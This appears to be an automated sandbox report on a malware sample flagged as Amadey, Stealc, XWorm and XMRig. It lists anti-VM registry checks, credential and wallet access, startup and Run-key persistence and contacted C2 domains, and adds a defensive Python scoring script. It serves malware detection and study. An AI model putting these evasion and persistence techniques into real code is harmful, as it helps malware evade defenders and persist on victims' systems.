Analysis Overview
SHA256
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
Threat Level: Known bad
The file 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066 was found to be: Known bad.
Malicious Activity Summary
xmrig
SystemBC
Stealc family
Stealc
Amadey
GCleaner
Detect Xworm Payload
Healer family
Healer
Xmrig family
Systembc family
Xworm
Detects Healer an antivirus disabler dropper
Xworm family
Gcleaner family
Amadey family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Checks BIOS information in registry
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Identifies Wine through registry keys
Drops startup file
Loads dropped DLL
Adds Run key to start application
Checks installed software on the system
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Kills process with taskkill
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of UnmapMainImage
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:36
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:36
Reported
2025-03-05 22:38
Platform
win7-20240903-en
Max time kernel
120s
Max time network
120s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
Files
memory/2208-0-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-1-0x00000000773B0000-0x00000000773B2000-memory.dmp
memory/2208-2-0x00000000000E1000-0x0000000000141000-memory.dmp
memory/2208-3-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-4-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-5-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-6-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-7-0x00000000000E1000-0x0000000000141000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:36
Reported
2025-03-05 22:38
Platform
win10v2004-20250217-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
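The VirtualBox, BIOS, Wine and computer-location tables above show the same cluster of registry reads from almost every dropped executable, which is what turns individually harmless lookups into an evasion signal. The following is an added example written for this page, not sandbox or malware code: it scores each process by the distinct anti-analysis keys it touches, using the key paths from the tables on this page. The weights, the threshold and the sample event list are the editor's assumptions; the events are constructed to mirror the rapes.exe rows above plus firefox.exe and cmd.exe as benign controls.

```python
"""Score processes by the anti-analysis registry reads listed in this report.

Added example (editor's, not part of the sandbox report). Key paths come from
the VirtualBox / BIOS / Wine / Geo / NLS tables on this page; weights,
threshold and the sample events are assumptions.
"""
import re

# (regex over the key path, weight, why it matters)
ANTI_ANALYSIS_KEYS = [
    (r"\\HARDWARE\\ACPI\\DSDT\\VBOX__$", 4, "VirtualBox ACPI table name"),
    (r"\\HARDWARE\\DESCRIPTION\\System\\(System|Video)BiosVersion$", 2,
     "BIOS strings carry VM vendor names"),
    (r"\\Software\\Wine$", 4, "only reason to open this key is to detect Wine"),
    (r"\\Control Panel\\International\\Geo\\Nation$", 1,
     "geo-fencing; legitimate software reads it too"),
    (r"\\Control\\NLS\\Language$", 0,
     "opened by cmd.exe, taskkill.exe and nearly everything else: noise"),
]
THRESHOLD = 6  # assumption: VBOX__ or Wine plus at least one corroborating key

RAPES = r"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\firefox.exe"
HKU = r"\REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000"
HW = r"\REGISTRY\MACHINE\HARDWARE"

# Constructed events modelled on the tables above: (pid, image, operation, key)
SAMPLE_EVENTS = [
    (4372, RAPES, "KeyOpened", HW + r"\ACPI\DSDT\VBOX__"),
    (4372, RAPES, "KeyOpened", HW + r"\ACPI\DSDT\VBOX__"),  # repeat: must not double count
    (4372, RAPES, "ValueQueried", HW + r"\DESCRIPTION\System\SystemBiosVersion"),
    (4372, RAPES, "ValueQueried", HW + r"\DESCRIPTION\System\VideoBiosVersion"),
    (4372, RAPES, "KeyOpened", HKU + r"\Software\Wine"),
    (4372, RAPES, "ValueQueried", HKU + r"\Control Panel\International\Geo\Nation"),
    (4372, RAPES, "KeyOpened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
    (6100, FIREFOX, "ValueQueried", HW + r"\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier"),
    (6100, FIREFOX, "KeyOpened", r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
    (7012, r"C:\Windows\SysWOW64\cmd.exe", "KeyOpened",
     r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
    # a lone BIOS read (installers, inventory agents) stays under the threshold
    (8020, r"C:\Users\Admin\Downloads\setup.exe", "ValueQueried",
     HW + r"\DESCRIPTION\System\SystemBiosVersion"),
]


def score_events(events):
    """Return {pid: {"image", "score", "why"}}; each distinct key counts once per process."""
    per_proc = {}
    for pid, image, _op, key in events:
        info = per_proc.setdefault(pid, {"image": image, "score": 0, "why": [], "_seen": set()})
        if key.lower() in info["_seen"]:
            continue
        for pattern, weight, why in ANTI_ANALYSIS_KEYS:
            if re.search(pattern, key, re.IGNORECASE):
                info["_seen"].add(key.lower())
                info["score"] += weight
                if weight:
                    info["why"].append(why)
                break
    return per_proc


def flagged(events, threshold=THRESHOLD):
    """Images whose anti-analysis score reaches the threshold."""
    return sorted(i["image"] for i in score_events(events).values() if i["score"] >= threshold)


if __name__ == "__main__":
    for pid, info in score_events(SAMPLE_EVENTS).items():
        print(pid, info["score"], info["image"], "; ".join(info["why"]))
    print("flagged:", flagged(SAMPLE_EVENTS))
```

Two practical notes. Sysmon does not record key opens or value reads (its registry events cover create, delete, rename and value set), so this kind of scoring needs sandbox API hooks or an ETW registry provider as its input. The NLS\Language key gets weight 0 on purpose: the System Language Discovery table further down shows cmd.exe, taskkill.exe, schtasks.exe and powershell.exe opening it, so on its own it separates nothing.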
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c5f6f0d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107500101\\83c5f6f0d5.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e644351a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107510101\\5e644351a1.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c305bd773.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107520101\\8c305bd773.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
